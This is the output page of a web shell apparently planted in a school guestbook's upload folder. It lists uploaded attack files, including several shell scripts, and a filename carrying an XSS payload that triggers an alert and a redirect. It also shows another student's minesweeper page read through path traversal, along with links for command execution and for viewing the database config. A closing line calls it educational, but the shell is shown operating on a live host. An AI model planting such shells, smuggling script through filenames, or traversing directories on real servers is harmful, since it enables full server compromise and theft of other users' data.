🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../589181.klas4s23.mid-ica.nl/public_html/Gamecraft/minesweeper.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/main.css">
    <link rel="stylesheet" href="css/minesweeper.css">
    <title>Document</title>
</head>
<body>
    <div class="wrapper" id="wrapper">
        <div id="topBar" class="topBar">
            <!--Logo-->
            <img src="img/topBar/TBLogo.png" alt="Logo" id="tb-logo">
            <!--HomeBTN-->
            <a href="index.html" class="topBarItem" id="tb-home">
                <img src="img/topBar/home.png" alt="Home" class="topBarIcon">
                <div class="tbitemvertline"></div>
                <p class="topBarText">Home</p>
            </a>
            <!--GamesBTN-->
            <a href="gamesPage.html" class="topBarItem" id="tb-games">
                <img src="img/topBar/games.png" alt="Games" class="topBarIcon">
                <div class="tbitemvertline"></div>
                <p class="topBarText">Games</p>
            </a>
            <!--AboutBTN-->
            <a href="about.html" class="topBarItem" id="tb-about">
                <img src="img/topBar/about.png" alt="About" class="topBarIcon">
                <div class="tbitemvertline"></div>
                <p class="topBarText">About</p>
            </a>
            <!--ContactBTN-->
            <a href="contact.html" class="topBarItem" id="tb-contact">
                <img src="img/topBar/contact.png" alt="Contact" class="topBarIcon">
                <div class="tbitemvertline"></div>
                <p class="topBarText">Contact</p>
            </a>
        </div>

        <div class="content" id="content">
            <!-- ============ Voeg hier je content toe ============ -->
            <div class="MS-container" id="MS-container">
                <h1>MINESWEEPER</h1>
                <div class="scoreScreen" id="scoreScreen">
                    <p class="timer" id="timer">Time: <br>0</p>
                    <p class="bombs" id="bombs">Bombs: <br>40</p>
                    <p class="points" id="points">Points: <br>1000</p>
                    <p class="highscore" id="highscore">Highscore: <br>?</p>
                </div>
                <div class="game" id="game">
                </div>
                <div class="selectionbuttons">
                    <button id="selectbtn" class="btnactive" onclick="btnselect()"><img src="pictures/shovel.webp" alt="" width="40px">Clear</button>
                    <button id="flagbtn" class="" onclick="btnflag()"><img src="pictures/flag.webp" alt="" width="40px">Flag</button>
                </div>
                <div class="howtoplay" id="howtoplay" onclick="toggleExplaination()">how to play?</div>
                
                <!-- youwinSchreen -->
                <div class="youwin hide" id="youwin">
                    <center>
                        <h1>YOU WIN</h1>
                        <h1 id="score"></h1>
                        <button id="playagain" onclick="playagain()">Play Again</button>
                    </center>
                </div>
                <div class="youlose hide" id="youlose">
                    <center>
                        <h1>YOU LOSE</h1>
                        <button id="playagain" onclick="playagain()">Play Again</button>
                    </center>
                </div>
                <div class="explaination hide" id="explaination">
                    <center>
                        <p class="explainationText">
                            The goal of minesweeper is to find all the mines in the minefield.<br><br>
        
                            You start the game with a 16x16 grid of squares, this is the minefield.<br>
                            There are 40 mines randomly distributed in the minefield.<br><br>
        
                            If you click one of the squares you will start at a mine-free zone.<br>
                            And you will see that the squares on the edges of that zone will have numbers on them.<br>
                            These numbers tell you how many mines are ajacent to it.<br>
                            So if it says 3, that means there are 3 mines around it.<br><br>
        
                            If you think a cell is free you can clear it by clicking it.<br>
                            This will reveal a number on the cell you cleared.<br>
                            This number again is how many mines are around that cell.<br><br>
        
                            If you are sure a cell contains a mine you can place a flag on it.<br>
                            Placing a flag is done by clicking the "flag" button on the bottom of the screen and then clicking the cell you want to mark.<br><br>
        
                            But if you clear a cell with a mine instead of marking it, the mine will explode.<br>
                            So try to think before clicking a cell.<br><br>
        
                            When you marked all the mines with a flag*, YOU WIN!<br><br>
        
                            * only the bombs, if the total flags are above 40 you still have to deselect the ones that aren't bombs
                        </p>
                        <button onclick="toggleExplaination()">Exit</button>
                    </center>
                </div>
            </div>
        </div>
    </div>
    <div class="footer">Copyright © 2023</div>
    <script src="js/main.js"></script>
    <script src="js/minesweeper.js"></script>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!